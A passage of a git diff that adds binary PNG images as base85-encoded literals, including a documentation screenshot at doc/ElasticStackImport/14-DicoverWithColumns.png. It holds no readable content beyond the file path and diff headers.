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 J^!&}o{{@ntATj^| literal 0 HcmV?d00001 
diff --git a/doc/ElasticStackImport/14-DicoverWithColumns.png b/doc/ElasticStackImport/14-DicoverWithColumns.png new file mode 100644 index 0000000000000000000000000000000000000000..eba0dcfd4b694268b9d0185cd344acb52ad9bc1f GIT binary patch literal 516484 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 